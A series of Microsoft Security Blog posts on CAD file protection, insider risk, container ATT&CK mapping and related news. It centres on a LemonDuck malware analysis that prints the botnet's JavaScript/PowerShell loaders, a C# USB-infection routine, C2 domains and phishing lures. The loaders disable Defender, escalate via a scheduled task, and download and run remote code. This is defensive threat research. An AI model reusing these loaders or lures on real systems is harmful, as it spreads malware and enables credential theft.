Scenario 1 (Designer):

The user is the designer who owns the design files. Based on the user privileges defined, the designer can view, edit, copy, print, and export the files.

Scenario 2 (Engineer):

The user is an engineer who consumes the design file shared with them by the engineering team. The engineer can view and edit the files. They can make modifications to the original file and share it. They do not have the privilege to copy, print, or export the files, or to use the snipping tool to make a copy.

Scenario 3 (Partner who has SECUDE solution):

In a typical manufacturing environment, CAD drawings are shared with many third-party partners and vendors across the supply chain for day-to-day operations. In this scenario, a partner who has purchased the SECUDE solution can only view the CAD files, per the privilege enforcement that has been set.

Scenario 4 (Unauthorized user):

If an unauthorized user outside of the organization tries to open the CAD drawings, the files remain encrypted, and the user will not be able to open them.

Benefits of SECUDE’s HALOCAD

  1. HALOCAD extends the security templates provided by MIP to sensitive CAD files throughout the design lifecycle.
  2. HALOCAD applies sensitivity labels automatically during the check-out process without user engagement.
  3. HALOCAD preserves the file extension, so users see no difference and their workflow is not disrupted.
  4. If an unauthorized user tries to open a document in an AutoCAD application without the HALOCAD extension, they will not be able to open the file, even though the extension is *.dwg.
  5. HALOCAD currently supports the following CAD applications:
    • Autodesk Inventor and AutoCAD
    • PTC Creo
    • Siemens NX and Solid Edge
  6. HALOCAD also supports the following PLM applications:
    • PTC Windchill
    • Siemens Teamcenter

For more information about the HALOCAD solution, please visit the SECUDE HALOCAD website. You can also find HALOCAD in Azure Marketplace.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit our website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


The post How to protect your CAD data files with MIP and HALOCAD appeared first on Microsoft Security Blog.

A guide to balancing external threats and insider risk

July 22nd, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Rockwell Automation Vice President and Chief Information Security Officer Dawn Cappelli. In this blog post, Dawn talks about the importance of including insider risk in your cybersecurity plan. 

Natalia: What is the biggest barrier that organizations face in addressing insider risk?

Dawn: The biggest barrier is drawing attention to insider risk. We heard about the ransomware group bringing down the Colonial Pipeline. We hear about ransomware attacks exposing organizations’ intellectual property (IP). We’re not hearing a lot about insider threats. We haven’t had a big insider threat case since Edward Snowden, which sometimes makes it hard to get buy-in for an insider risk program. But I guarantee insider threats are happening. Intellectual property is being stolen and systems are being sabotaged. The question is whether they are being detected—are companies looking?

Natalia: How do you assess the success of an insider risk program?

Dawn: First, we measure our success by significant cases. For instance, we have someone leaving the company to go to a competitor, we catch them copying confidential information that they clearly want to take with them, and we get it back.

Second, we measure success by looking at the team’s productivity. Everyone in the company has a risk score based on suspicious or anomalous activity as well as contextual data (for instance, that they are leaving the company). Every day we start at the top of the dashboard with the highest risk and work our way down. We look at how many cases have no findings because that means we’re wasting time, and we need to adjust our risk models to eliminate false positives.

We also look at the reduction in cases because we focus a lot on deterrence, communication, and awareness, as well as cases by business unit and by region. We run targeted campaigns and training for specific business units or types of employees, regions, or countries, and then look at whether those were effective in reducing the number of cases.

Natalia: How does measuring internal threats differ from measuring external threats?

Dawn: From an external risk perspective, you need to do the same thing—see if your external controls are working and if they’re blocking significant threats. Our Computer Security Incident Response Team (CSIRT) also looks at the time to contain and the time to remediate. We should also measure how long it takes to respond to and recover IP taken by insiders.

By the way, I like using the term “insider risk” instead of “insider threat” because we find that most suspicious insider activity we detect and respond to is not intentionally malicious. Especially during COVID-19, we see more employees who are concerned about backing up their computer, so they pull out their personal hard drive and use it to make a backup. They don’t have malicious intent, but we still must remediate the risk. Next week they could be recruited by a competitor, and we can’t take the chance that they happen to have a copy of our confidential information on a removable media device or in personal cloud storage.

Natalia: How do you balance protecting against external threats and managing insider risks?

Dawn: You need to consider both. You should be doing threat modeling for external threats and insider risks and prioritizing your security controls accordingly. An insider can do anything an external attacker can do. There was a case in the media recently where someone tried to bribe an insider to plug in an infected USB drive to get malware onto the company’s network or open an infected attachment in an email to spread the malware. An external attacker can get in and do what they want to do much easier through an insider.

We use the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) for our security program, and we use it to design a holistic security program that encompasses both external and insider security risks. For example, we identify our critical assets and who should have access to them, including insiders and third parties. We protect those assets from unauthorized access—including insiders and outsiders. We detect anomalous or suspicious behavior from insiders and outsiders. We respond to all incidents and recover when necessary. We have different processes, teams, and technologies for our insider risk program, but we also use many of the same tools as the CSIRT, like our Security Information and Event Management (SIEM) and Microsoft Office 365 tools.

Natalia: What best practices would you recommend for data governance and information protection?

Dawn: Don’t think about insider threats only from an IP perspective. There’s also the threat of insider cyber sabotage, which means you need to detect and respond to activities like insiders downloading hacking tools or sabotaging your product source code.

Think about it: an external attacker has to get into the network, figure out where the development environment is, get the access they need to compromise the source code or development environment, plant the malicious code or backdoor into the product—all without being detected. It would be a lot easier for an insider to do that because they know where the development environment is, they have access to it, and they know how the development processes work.

When considering threat types, I wouldn’t say that you need to focus more on cyber sabotage than IP; you need to focus on them equally. The mitigations and detections are different for IP theft versus sabotage. For theft of IP, we’re not looking for people trying to download malware, but for sabotage, we are. The response processes are also different depending on the threat vector.

Natalia: Who needs to be involved in managing and reducing insider risk, and how?

Dawn: You need an owner for your insider risk program, and in my opinion, that should be the Chief Information Security Officer (CISO). HR is a key member of the virtual insider risk team because happy people don’t typically commit sabotage; it’s employees who are angry and upset, and they tend to come to the attention of HR. Every person in Rockwell HR takes mandatory insider risk training every year, so they know the behaviors to look for.

Legal is another critical member of the team. We can’t randomly take people’s computers and do forensics for no good reason, especially in light of all the privacy regulations around the world. The insider risk investigations team is in our legal department and works with legal, HR, and managers. For any case involving personal information and any case in Europe, we go to our Chief Privacy Officer and make sure that we’re adhering to all the privacy laws. In some countries, we also have to go to the Works Council and let them know we’re investigating an employee. The security team is responsible for all the controls—preventive, detective—technology, and risk models.

Natalia: What’s next in the world of data regulation?

Dawn: Privacy is the biggest issue. The Works Councils in Europe are becoming stronger and more diligent. They are protecting the privacy of their fellow employees, and the privacy review processes make the deployment of monitoring technology more challenging.

In the current cyber threat environment, we must figure out how to get security and privacy to work together. My advice to companies operating in Europe is to go to the Works Councils as soon as you’re thinking about purchasing new technology. Make them part of the process and be totally transparent with them. Don’t wait until you’re ready to deploy.

Natalia: How will advancements like cloud computing and AI change the risk landscape?

Dawn: We have a cloud environment, and our employees are using it to develop products. From inception, the insider risk team worked to ensure that we’re always threat modeling the environment. We go through the entire NIST CSF for that cloud environment and look at it from both an external and insider risk perspective.

Companies use empirical, objective data to create and train AI models for their products. The question becomes, “Do you have controls to identify an insider who deliberately wants to bias your models or put something malicious into your AI models to make it go off course later?” With any type of threat, ask if an insider could facilitate this type of attack. An insider can do anything an outsider can do, and they can do it much easier.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post A guide to balancing external threats and insider risk appeared first on Microsoft Security Blog.

When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure

July 22nd, 2021 No comments

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 will be a deep dive on the attacker behavior and will provide investigation guidance.]

Combating and preventing today’s threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines—even so-called commodity malware—can bring in more dangerous threats. We’ve seen this in banking Trojans serving as an entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that’s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck’s threat to enterprises is also in the fact that it’s a cross-platform threat. It’s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms—phishing emails, exploits, USB devices, brute force, among others—and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched Exchange Server vulnerabilities to gain access to outdated systems.

This threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.

In the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.

Figure 1. Global distribution of LemonDuck botnet activity

In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.

In-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.

LemonDuck and LemonCat infrastructure

The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.

LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.
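For illustration, a defender reviewing proxy logs could match this user-agent format with a simple check. This is a hedged hunting sketch, not an official detection; the report quotes the format with single uppercase letters per field, and the pattern below allows one or more alphabetical characters per field as a tolerant assumption.

```python
import re

# Illustrative hunting sketch. The quoted format is "Lemon-Duck-[A-Z]-[A-Z]";
# [A-Z]+ is an assumption that each trailing field is one or more uppercase
# letters.
LEMONDUCK_UA = re.compile(r"^Lemon-Duck-[A-Z]+-[A-Z]+$")

def is_lemonduck_user_agent(user_agent: str) -> bool:
    """Return True if a user-agent string matches the LemonDuck bot format."""
    return LEMONDUCK_UA.match(user_agent) is not None
```

A match on an entry such as "Lemon-Duck-A-B" would flag that log line as a candidate for review.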

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses the historical infrastructure discussed in this report. It runs campaigns with high consistency and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in its scripts.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.


Sample Duck domains:
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com

Sample Cat domains:
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com


The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.
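For hunting purposes, shared task names like these can be checked directly against a host’s scheduled tasks. The sketch below is illustrative only; “blackball” is the sole task name given in this report, so the list would need to be extended from current threat intelligence.

```python
# Illustrative sketch: "blackball" is the only shared task name named in
# this report; a real list would come from current threat intelligence.
KNOWN_LEMONDUCK_TASK_NAMES = {"blackball"}

def suspicious_scheduled_tasks(task_names):
    """Return the scheduled task names that match known LemonDuck task names."""
    return {name for name in task_names if name.lower() in KNOWN_LEMONDUCK_TASK_NAMES}
```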

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, its core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content remained static, as did the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.


Sample email subjects:
  • The Truth of COVID-19
  • COVID-19 nCov Special info WHO
  • WTF
  • What the fcuk
  • good bye
  • farewell letter
  • broken file
  • This is your order?

Sample email body content:
  • Virus actually comes from United States of America
  • very important infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
  • what’s wrong with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s wrong with you?
  • good bye, keep in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.
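One such custom rule could start from a simple triage heuristic over attachment names, based on the lure characteristics described earlier (a file named “readme” with a .doc, .js, or .zip extension). This is a hedged sketch: it inspects names only and does not look inside .zip archives for the embedded .js file.

```python
import os

# Hedged triage heuristic based on the lure described above: an attachment
# named "readme" with a .doc, .js, or .zip extension. Name-only check; it
# does not inspect archive contents.
LURE_EXTENSIONS = {".doc", ".js", ".zip"}

def is_lemonduck_lure_attachment(filename: str) -> bool:
    stem, ext = os.path.splitext(filename)
    return stem.lower() == "readme" and ext.lower() in LURE_EXTENSIONS
```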

Since LemonDuck began operating, the .zip to .js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April 2020.


April 2020 PowerShell script:

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.

March 2021 PowerShell script:

var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'')";,0,1);
//This File is broken.
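When analyzing captured scripts like these, one useful first step is extracting the string literals passed to DownLoadString to recover C2 URL fragments for pivoting. The sketch below is a simplification: real samples concatenate fragments and insert backticks into cmdlet and method names, which this naive regex does not handle.

```python
import re

# Hypothetical analysis helper: capture the first string literal passed to
# DownLoadString in a script. Obfuscated variants (e.g., backtick-broken
# method names) would evade this simple pattern.
DOWNLOAD_RE = re.compile(r"DownLoadString\('([^']*)'", re.IGNORECASE)

def download_fragments(script_text: str) -> list:
    """Return the string fragments passed as the first literal to DownLoadString."""
    return DOWNLOAD_RE.findall(script_text)
```

Run against the March 2021 sample above, this recovers the leading fragment "http://t.z" for infrastructure pivoting.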


After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
{
    if (blacklist.Contains(drive.Name)) { continue; }
    Console.WriteLine("Detect drive:" + drive.Name);
    if (IsSupported(drive))
    {
        if (!File.Exists(drive + home + inf_data))
        {
            Console.WriteLine("Try to infect " + drive.Name);
            if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
            { /* drive now carries the implant and marker file */ }
        }
        else
        {
            Console.WriteLine(drive.Name + " already infected!");
        }
    }
}
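
A defender can mirror this spreader logic for triage. The sketch below is a hypothetical, name-only check over a drive’s file listing for the dropped readme.js implant; real hunting should also look for the hidden home directory and marker files described above.

```python
# Hypothetical, name-only triage mirroring the spreader logic above: flag a
# drive whose file listing contains the dropped readme.js implant. Matches
# are candidates for review, not confirmed infections.
def drive_looks_infected(file_names) -> bool:
    return any(name.lower() == "readme.js" for name in file_names)
```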

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.

Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management

July 21st, 2021

Today on the Official Microsoft Blog, Microsoft announced the acquisition of CloudKnox Security, a leader in Cloud Infrastructure Entitlement Management (CIEM). CloudKnox offers complete visibility into privileged access. It helps organizations right-size permissions and consistently enforce least-privilege principles to reduce risk, and it employs continuous analytics to help prevent security breaches and ensure compliance. The acquisition further enables Microsoft Azure Active Directory (Azure AD) customers with granular visibility, continuous monitoring, and automated remediation for hybrid and multi-cloud permissions.

As the corporate network perimeter disappears, it’s crucial to establish a strong cloud identity foundation through a Zero Trust approach so you can protect business-critical systems, while improving business agility. We’re committed to making it easier to enforce appropriate, tailored privileges and other identity controls across multi-cloud environments, as organizations adapt to hybrid work, new risks, and business transformation.

Read more on Microsoft acquires CloudKnox Security to offer unified privileged access and cloud entitlement management.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.







The evolution of a matrix: How ATT&CK for Containers was built

July 21st, 2021

Note: The content of this post is being released jointly with the Center for Threat-Informed Defense. It is co-authored with Chris Ante and Matthew Bajzek. The Center post can be found here.

As containers become a major part of many organizations’ IT workloads, it becomes crucial to consider the unique security threats that target such environments when building security solutions. The first step in this process is understanding the relevant attack landscape.

The MITRE ATT&CK® team has received frequent questions from the community about if or when ATT&CK would include coverage for adversary behavior in containers. Previous iterations of ATT&CK have included references to containers (for example, Resource Hijacking) and some clearly container-relevant techniques (for example, Implant Internal Image), but the coverage was insufficient to provide network defenders a holistic view of how containers are being targeted in enterprise environments.

Addressing the need for a common framework for understanding container threats

Given clear community interest, inspiration from Microsoft’s work on the threat matrix for Kubernetes, and the publication of research from other teams, the Center for Threat-Informed Defense launched an investigation (sponsored by several Center members including Microsoft) that examined the viability of adding containers content to ATT&CK. The purpose of the Container Techniques project was to investigate adversarial behavior in containerization technologies and determine whether there was enough open-source intelligence to warrant the creation of an ATT&CK for Containers matrix, resulting in either new ATT&CK content or a report on the state of in-the-wild Container-based tactics, techniques, and procedures (TTPs). The Center’s research team quickly concluded that there was more than enough open-source intelligence to justify technique development, ultimately resulting in the new matrix.

As of the ATT&CK v9 release, the ATT&CK for Containers matrix is officially available. More details about the Containers matrix can be found in MITRE-Engenuity’s announcement blog. Some highlights of the new matrix include related software entries, procedure examples to help network defenders better understand new container-centric techniques, data sources to match the recent ATT&CK data sources refactor, and many others.

A matrix of attack techniques related to containerization technologies, organized by stages of an attack.

Figure 1. ATT&CK for Containers matrix.

Evolving the threat matrix

MITRE ATT&CK has become the common vocabulary for describing real-world adversary behavior. ATT&CK offers organizations a method to measure their defenses against threats that impact their environment and identify possible gaps. With ATT&CK’s approach of methodically outlining the possible threats, Microsoft built the threat matrix for Kubernetes, which was one of the first attempts to systematically map the attack surface of Kubernetes. An updated version of the matrix was released earlier in 2021.

A matrix of attack techniques specific to Kubernetes, organized by stages of an attack.

Figure 2: Threat matrix for Kubernetes.

Microsoft took part in the Center’s project and contributed knowledge that the company gained in the field of container security. Microsoft’s unparalleled visibility into threats helps to identify real-world attacks against containerized workloads and provide information about tactics and techniques used in those attacks. One example of such an attack is a cryptocurrency mining campaign that targeted Kubernetes. In this incident, Microsoft saw evidence of the following techniques from the Microsoft threat matrix:

  • Exposed sensitive interfaces
  • New container
  • Pod/container name similarity
  • List Kubernetes secrets
  • Access Kubernetes API server
  • Resource Hijacking

The techniques that went into ATT&CK for Containers are different from those in the Microsoft threat matrix. As described in a blog post by the Center, it was preferable to use an existing ATT&CK technique rather than create a new one when possible. Therefore, several techniques from the threat matrix were mapped into existing Enterprise ATT&CK techniques. For example, in the techniques listed above, “Exposed sensitive interfaces” from the threat matrix is equivalent to ATT&CK’s “External Remote Services.”

The Center’s process for leveraging Microsoft’s Kubernetes threat matrix was as follows:

  • Cross-referencing threat intelligence with the techniques in the Kubernetes threat matrix.
  • Determining whether techniques with sufficient intelligence backing were already covered by existing Enterprise ATT&CK techniques, or whether they justified the creation of one or more new techniques or sub-techniques.

  • Considering Microsoft’s tactics mapping for specific techniques and how they fit within ATT&CK’s Enterprise, Cloud, and Containers matrix scoping. In the case of multiple forms of “lateral movement,” for example, the Center instead identified pivots from one ATT&CK platform matrix to another (for example, Containers to Cloud).

The following are examples of techniques from Microsoft’s matrix that were re-scoped to fit into existing Enterprise ATT&CK techniques:

Microsoft threat matrix   MITRE ATT&CK
Application vulnerability –> Exploit Public-Facing Application
Exposed sensitive interfaces –> External Remote Services
Clear container logs –> Indicator Removal on Host
Pod/container name similarity –> Masquerading: Match Legitimate Name or Location
Access Kubelet API –> Network Service Scanning
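The mapping above can be expressed as a small lookup table. Note that the ATT&CK technique IDs shown here are added for convenience from the public ATT&CK knowledge base and are not part of the original mapping; verify them against the current ATT&CK release.

```python
# Kubernetes threat matrix technique -> (ATT&CK technique name, technique ID).
# IDs are from the public ATT&CK knowledge base and should be re-verified.
K8S_MATRIX_TO_ATTACK = {
    "Application vulnerability": ("Exploit Public-Facing Application", "T1190"),
    "Exposed sensitive interfaces": ("External Remote Services", "T1133"),
    "Clear container logs": ("Indicator Removal on Host", "T1070"),
    "Pod/container name similarity": ("Masquerading: Match Legitimate Name or Location", "T1036.005"),
    "Access Kubelet API": ("Network Service Scanning", "T1046"),
}

def attack_technique(matrix_name: str):
    """Translate a Kubernetes threat matrix technique name to its ATT&CK entry."""
    return K8S_MATRIX_TO_ATTACK.get(matrix_name)
```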

Meanwhile, the following are examples of techniques from the Microsoft threat matrix that were re-scoped based on the Center’s platform decisions and additional open-source intelligence, with additional detail on each technique/sub-technique available in its description within ATT&CK for Containers:

Microsoft threat matrix   MITRE ATT&CK
Exec into container + bash/cmd inside container –> Container Administration Command
New container –> Deploy Container
Kubernetes CronJob –> Scheduled Task/Job: Container Orchestration Job
HostPath mount + Writable volume mounts on the host –> Escape to Host

Not all the techniques and tactics that appear in the Microsoft threat matrix went into the new ATT&CK matrix. ATT&CK focuses on real-world techniques that are seen in the wild. In contrast, many of the techniques in the threat matrix were observed during research work and not necessarily as part of an active attack. For example, “CoreDNS poisoning” from the updated matrix is a possible attack vector but hasn’t been seen in the wild yet.

ATT&CK is dynamic

ATT&CK for Containers is by no means finished, and we look forward to future additions based on new intelligence and further community contributions. Before the public release of ATT&CK for Containers, Microsoft released an updated version of the threat matrix for Kubernetes, which speaks to the fast-paced evolution of this technology space and the need to keep up with new adversary behaviors.

The next step for the ATT&CK team is to assess the new content in Microsoft’s matrix and consider it for potential future inclusion in ATT&CK based on the factors described above. Microsoft and the ATT&CK team will continue to collaborate to ensure that container techniques coverage in ATT&CK is up-to-date and can continue to serve the need of the community.

With the completion of this Center project, ATT&CK for Containers will be maintained by the ATT&CK team, who would love your continued feedback and contributions! Let the team know what you think, what could be improved, and most importantly what you see adversaries doing in the wild related to containers. Feel free to reach out to the ATT&CK team at any time, and if you have ideas for other research and development projects that the Center should consider, contact the Center as well.

Learn more

To learn how Microsoft can help you protect containers and relevant technologies today, read about Microsoft Defender for Endpoint and Azure Defender.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.


Introducing Bounty Awards for Teams Mobile Applications Security Research

July 19th, 2021

We are pleased to announce the addition of Microsoft Teams mobile applications to the Microsoft Applications Bounty Program. Through the expanded program we welcome researchers from across the globe to seek out and disclose any high impact security vulnerabilities they may find in Teams mobile applications to help secure customers. Rewards up to $30,000 USD …


Announcing the Top MSRC 2021 Q2 Security Researchers – Congratulations!

July 15th, 2021

We’re excited to announce the top contributing researchers for the 2021 Second Quarter (Q2)! Congratulations to all the researchers recognized in this quarter’s leaderboard and thank you to everyone who continues to help secure our customers and the ecosystem. The top three researchers of the 2021 Q2 Security Researcher Leaderboard are: Yuki Chen (765 points), …


Protecting customers from a private-sector offensive actor using 0-day exploits and DevilsTongue malware

July 15th, 2021

The Microsoft Threat Intelligence Center (MSTIC) alongside the Microsoft Security Response Center (MSRC) has uncovered a private-sector offensive actor, or PSOA, that we are calling SOURGUM in possession of now-patched, Windows 0-day exploits (CVE-2021-31979 and CVE-2021-33771).

Private-sector offensive actors are private companies that manufacture and sell cyberweapons in hacking-as-a-service packages, often to government agencies around the world, to hack into their targets’ computers, phones, network infrastructure, and other devices. With these hacking packages, usually the government agencies choose the targets and run the actual operations themselves. The tools, tactics, and procedures used by these companies only add to the complexity, scale, and sophistication of attacks. We take these threats seriously and have moved swiftly alongside our partners to build in the latest protections for our customers.

